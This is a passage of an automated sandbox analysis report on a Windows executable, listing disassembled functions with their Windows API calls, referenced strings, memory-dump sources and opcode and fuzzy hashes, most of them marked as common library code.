                                                                                              • Opcode ID: ddb2ba17ea66b818c62a56137ad10b2c3bccdcae6bde80564991cfb45d54b338
                                                                                              • Instruction ID: 39d0de3060103841c4b02407273362da1ac651dbba035d5b224056a48879203e
                                                                                              • Opcode Fuzzy Hash: ddb2ba17ea66b818c62a56137ad10b2c3bccdcae6bde80564991cfb45d54b338
                                                                                              • Instruction Fuzzy Hash: DAE137719002589EDB25EBA4D885BDDB7B8AF08344F1424EAE50DB7291DB349B88CF60
                                                                                              Function 00E8977A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00E89771,00E896CC,00E86A64), ref: 00E89788
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E89796
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E897AF
                                                                                              • SetLastError.KERNEL32(00000000,00E89771,00E896CC,00E86A64), ref: 00E89801
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 0b795611c13993bb4b25a4d3e88d96468b3f7769c6362b44108313e41ef328f8
                                                                                              • Instruction ID: 0803752f044480ea2fd5e89a8020c1a01e1c6ecb80cc27aae3796da7617966e4
                                                                                              • Opcode Fuzzy Hash: 0b795611c13993bb4b25a4d3e88d96468b3f7769c6362b44108313e41ef328f8
                                                                                              • Instruction Fuzzy Hash: 0D01F13292D2129EA6243EBABC9557A2794EB46379738133BF02D710E2EA125C04D354
                                                                                              Function 00E90005 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00E8B581,?,00EAE088,?,00E8AE80,?,00EAE088,?,00000007), ref: 00E90009
                                                                                              • _free.LIBCMT ref: 00E9003C
                                                                                              • _free.LIBCMT ref: 00E90064
                                                                                              • SetLastError.KERNEL32(00000000,00EAE088,?,00000007), ref: 00E90071
                                                                                              • SetLastError.KERNEL32(00000000,00EAE088,?,00000007), ref: 00E9007D
                                                                                              • _abort.LIBCMT ref: 00E90083
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: b38ffaaa5988a8aa984052e7ec7ae564565391ea14a8e4894bc7523c37cf4e5e
                                                                                              • Instruction ID: 3d1d860afc714ba064873c4468644f061d5849237d6feaf5f56a7ccc829b8f0d
                                                                                              • Opcode Fuzzy Hash: b38ffaaa5988a8aa984052e7ec7ae564565391ea14a8e4894bc7523c37cf4e5e
                                                                                              • Instruction Fuzzy Hash: EEF0C835104601AFCF2273396C06F6F26969FC1775F652515F51CB2192FE348C468224
                                                                                              Function 00E83FCF Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E83FDB
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E83FF5
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E84006
                                                                                              • TranslateMessage.USER32(?), ref: 00E84010
                                                                                              • DispatchMessageW.USER32(?), ref: 00E8401A
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E84025
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              • Opcode ID: 84e1107da89649a2e047c95b7372e72e9d8dc79f2e2c9d5d437f99335f036523
                                                                                              • Instruction ID: 712e3ce2d7a7dcb74f8ea440829ce45946ab6df0b439cfa16057a59740b50c56
                                                                                              • Opcode Fuzzy Hash: 84e1107da89649a2e047c95b7372e72e9d8dc79f2e2c9d5d437f99335f036523
                                                                                              • Instruction Fuzzy Hash: 92F03C72E0112AABCB207BA2EC4CEDF7E6DEF85791F104112B64AF2090E6349545CBA0
                                                                                              Function 00E82493 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 216windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00E826A9
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00EB5380), ref: 00E826D6
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E82702
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E834F2
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00E825F4
                                                                                              • ProgramFilesDir, xrefs: 00E825E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$H_prolog3_Item
                                                                                              • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 4098331016-2634093826
                                                                                              • Opcode ID: d6b63be92bdad3e9a830cad72d35259d57f32e98bf5c6a951fef8c220ec095ba
                                                                                              • Instruction ID: 23326d73bf5d484e97aae3545d2935ec6908ed65ca1a2b5946d6594c84af104d
                                                                                              • Opcode Fuzzy Hash: d6b63be92bdad3e9a830cad72d35259d57f32e98bf5c6a951fef8c220ec095ba
                                                                                              • Instruction Fuzzy Hash: 59818F31940258DFDF25EBE0D891BEDB7B8AF18354F042199E60EB7181EB705B89CB61
                                                                                              Function 00E6A300 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 136COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6A307
                                                                                              • GetLastError.KERNEL32(00000054,?,?,?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049), ref: 00E6A427
                                                                                                • Part of subcall function 00E6AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E6AC2E
                                                                                                • Part of subcall function 00E6AC11: GetLastError.KERNEL32 ref: 00E6AC72
                                                                                                • Part of subcall function 00E6AC11: CloseHandle.KERNEL32(?), ref: 00E6AC81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege$K
                                                                                              • API String ID: 2235100918-4013019307
                                                                                              • Opcode ID: d7fb530664b7d30d602d1bfe61cb33bb3800d35a9cfa7b22fa18f54b4c9ccd22
                                                                                              • Instruction ID: bd9c26a79b3439ec1106000e8509050a7767b3f7163b31657eaf30a8a0dc353e
                                                                                              • Opcode Fuzzy Hash: d7fb530664b7d30d602d1bfe61cb33bb3800d35a9cfa7b22fa18f54b4c9ccd22
                                                                                              • Instruction Fuzzy Hash: 98417F71D40208AFDF14EBA8E885AEDB7F8AB49354F08602AF505B7341DBB599448B22
                                                                                              Function 00E7DC95 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$H_prolog3
                                                                                              • String ID: &nbsp;$<br>
                                                                                              • API String ID: 1035939448-26742755
                                                                                              • Opcode ID: 86e9a1a496d073d2f7da9523a88cf9c8e483737a14779296b3082d91cf471487
                                                                                              • Instruction ID: fc69d4fc5344a6e83de05f4257967516313d53faae6cf0731726ddbef3f6c76a
                                                                                              • Opcode Fuzzy Hash: 86e9a1a496d073d2f7da9523a88cf9c8e483737a14779296b3082d91cf471487
                                                                                              • Instruction Fuzzy Hash: E0415D30B082119BDB25AF50DD81B3D7372FF95704F20E52AE50AAB281EBB19992C7D1
                                                                                              Function 00E807E5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 00E807F5
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00E8081A
                                                                                              • DeleteObject.GDI32(00000000), ref: 00E8084C
                                                                                              • DeleteObject.GDI32(00000000), ref: 00E8086F
                                                                                                • Part of subcall function 00E7EBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E80845,00000066), ref: 00E7EBE6
                                                                                                • Part of subcall function 00E7EBD3: SizeofResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EBFD
                                                                                                • Part of subcall function 00E7EBD3: LoadResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EC14
                                                                                                • Part of subcall function 00E7EBD3: LockResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EC23
                                                                                                • Part of subcall function 00E7EBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E80845,00000066), ref: 00E7EC3E
                                                                                                • Part of subcall function 00E7EBD3: GlobalLock.KERNEL32(00000000), ref: 00E7EC4F
                                                                                                • Part of subcall function 00E7EBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E7EC73
                                                                                                • Part of subcall function 00E7EBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E7ECB8
                                                                                                • Part of subcall function 00E7EBD3: GlobalUnlock.KERNEL32(00000000), ref: 00E7ECD7
                                                                                                • Part of subcall function 00E7EBD3: GlobalFree.KERNEL32(00000000), ref: 00E7ECDE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                              • String ID: ]
                                                                                              • API String ID: 1797374341-3352871620
                                                                                              • Opcode ID: 1620ca70960798af8f72b16e75ba80f1be90f34ac002a52fbc43e4d1e02bb119
                                                                                              • Instruction ID: 4f8cc7ceb9f6bb73c8a24fa69bae438a7d13e1565a0dc7311d6549e7107cf881
                                                                                              • Opcode Fuzzy Hash: 1620ca70960798af8f72b16e75ba80f1be90f34ac002a52fbc43e4d1e02bb119
                                                                                              • Instruction Fuzzy Hash: 4001C032944205ABD72277A49C0AAAF3ABAAFC4B55F051165F908B7391DB718C0D87E0
                                                                                              Function 00E8ED2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E8ECE0,00000000,?,00E8EC80,00000000,00EA6F40,0000000C,00E8EDD7,00000000,00000002), ref: 00E8ED4F
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E8ED62
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00E8ECE0,00000000,?,00E8EC80,00000000,00EA6F40,0000000C,00E8EDD7,00000000,00000002), ref: 00E8ED85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: b6458719985ba20740de6bf070417336a0a41696bea884c9012dfb69db7f86dd
                                                                                              • Instruction ID: 91758d7d42ccd86561ec30ffd7b98b9be09a89de200affd6cacb39fd7a45b08d
                                                                                              • Opcode Fuzzy Hash: b6458719985ba20740de6bf070417336a0a41696bea884c9012dfb69db7f86dd
                                                                                              • Instruction Fuzzy Hash: F0F06D30900618FFCB00ABB1DC09BADBBA5EB48715F50006AE809B22A0CA304948CB90
                                                                                              Function 00E8631E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SleepConditionVariableCS.KERNELBASE(?,00E862BB,00000064), ref: 00E86341
                                                                                              • LeaveCriticalSection.KERNEL32(00EB60E0,?,?,00E862BB,00000064,?,?,?,?,00000000,00E9A75D,000000FF), ref: 00E8634B
                                                                                              • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,00E862BB,00000064,?,?,?,?,00000000,00E9A75D,000000FF), ref: 00E8635C
                                                                                              • EnterCriticalSection.KERNEL32(00EB60E0,?,00E862BB,00000064,?,?,?,?,00000000,00E9A75D,000000FF), ref: 00E86363
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                              • String ID: `
                                                                                              • API String ID: 3269011525-609909085
                                                                                              • Opcode ID: e30de6254c7e1fe2b631c742e15f27c48370cce9c6b9bf057f5bed7c6e95ac71
                                                                                              • Instruction ID: 5d5849cc260fc3d9f8058a8313679f4a14c9d9ee10e11750e570f5f91279321a
                                                                                              • Opcode Fuzzy Hash: e30de6254c7e1fe2b631c742e15f27c48370cce9c6b9bf057f5bed7c6e95ac71
                                                                                              • Instruction Fuzzy Hash: E1E01231941234EFC7213B97FC09BDE7F28EB44B91F145127F90AB6170C66559149BD4
                                                                                              Function 00E75094 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E76C5E: __EH_prolog3_GS.LIBCMT ref: 00E76C65
                                                                                                • Part of subcall function 00E76C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00E76C9A
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E750B3
                                                                                              • GetProcAddress.KERNEL32(00EB51F8,CryptUnprotectMemory), ref: 00E750C3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryH_prolog3_System
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 270589589-1753850145
                                                                                              • Opcode ID: da6f83e4fe6d443fad9c8589511594ead1ba6ce17e9e6c45ef0d7812cbb2822e
                                                                                              • Instruction ID: eafb031f404279ed755a0c56264fc75fb2b82f3b9ac8c1a7507aad66fc4eae83
                                                                                              • Opcode Fuzzy Hash: da6f83e4fe6d443fad9c8589511594ead1ba6ce17e9e6c45ef0d7812cbb2822e
                                                                                              • Instruction Fuzzy Hash: FFE04F71810B11DECB316B75DC08746BED46F05708F20E82EA4DDB3541D6B4E4408BA0
                                                                                              Function 00E8985A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2252061734-0
                                                                                              • Opcode ID: 8dff79b2d1384662ee4ba90ecb6b11913d23bb0e838fc35db1bf731b2a0aed4c
                                                                                              • Instruction ID: 1bcddc4c37a508990739d8fb00e33427d259054257200134e27524a462b6121c
                                                                                              • Opcode Fuzzy Hash: 8dff79b2d1384662ee4ba90ecb6b11913d23bb0e838fc35db1bf731b2a0aed4c
                                                                                              • Instruction Fuzzy Hash: 1651D272E012029FDB29AF54C941BBAB3A4EF84304F18652DE84D772A3E735EC84D790
                                                                                              Function 00E6F3BE Relevance: 7.7, APIs: 5, Instructions: 161filetimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6F3C5
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,00E6B749,?,?,?,?,?,?), ref: 00E6F450
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 00E6F4A7
                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 00E6F569
                                                                                              • CloseHandle.KERNEL32(?), ref: 00E6F570
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseH_prolog3_HandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 4002707884-0
                                                                                              • Opcode ID: 8864d82656026da6744dc93b76cd1f9e20f42974a59c24477cff318f05eaa1e4
                                                                                              • Instruction ID: ca363d94934538e33c7b1f44bbc772f44d26f408dca43a7fd4976b024337fb91
                                                                                              • Opcode Fuzzy Hash: 8864d82656026da6744dc93b76cd1f9e20f42974a59c24477cff318f05eaa1e4
                                                                                              • Instruction Fuzzy Hash: C251B171940248AADF10EFE8F885BEEBBF5AF48314F24512AF451F7280DB349A45CB24
                                                                                              Function 00E92BE0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00E92BE9
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E92C0C
                                                                                                • Part of subcall function 00E9040E: RtlAllocateHeap.NTDLL(00000000,00E8535E,?,?,00E86C16,?,?,?,?,?,00E85269,00E8535E,?,?,?,?), ref: 00E90440
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E92C32
                                                                                              • _free.LIBCMT ref: 00E92C45
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E92C54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: 90a675f7f03d8e210914b7d425790357a083591f6b25a499863d53948440f51c
                                                                                              • Instruction ID: 2b94a849875099c67541fb5b82593a821040cb639a23eb172e66941997032222
                                                                                              • Opcode Fuzzy Hash: 90a675f7f03d8e210914b7d425790357a083591f6b25a499863d53948440f51c
                                                                                              • Instruction Fuzzy Hash: C101A772A026157F3F2526775C8CC7FBABDDFC6B65325112EFA04F6211DA608C0191B4
                                                                                              Function 00E90089 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00E8535E,00E8535E,?,00E901D8,00E90451,?,?,00E86C16,?,?,?,?,?,00E85269,00E8535E,?), ref: 00E9008E
                                                                                              • _free.LIBCMT ref: 00E900C3
                                                                                              • _free.LIBCMT ref: 00E900EA
                                                                                              • SetLastError.KERNEL32(00000000,?,00E8535E), ref: 00E900F7
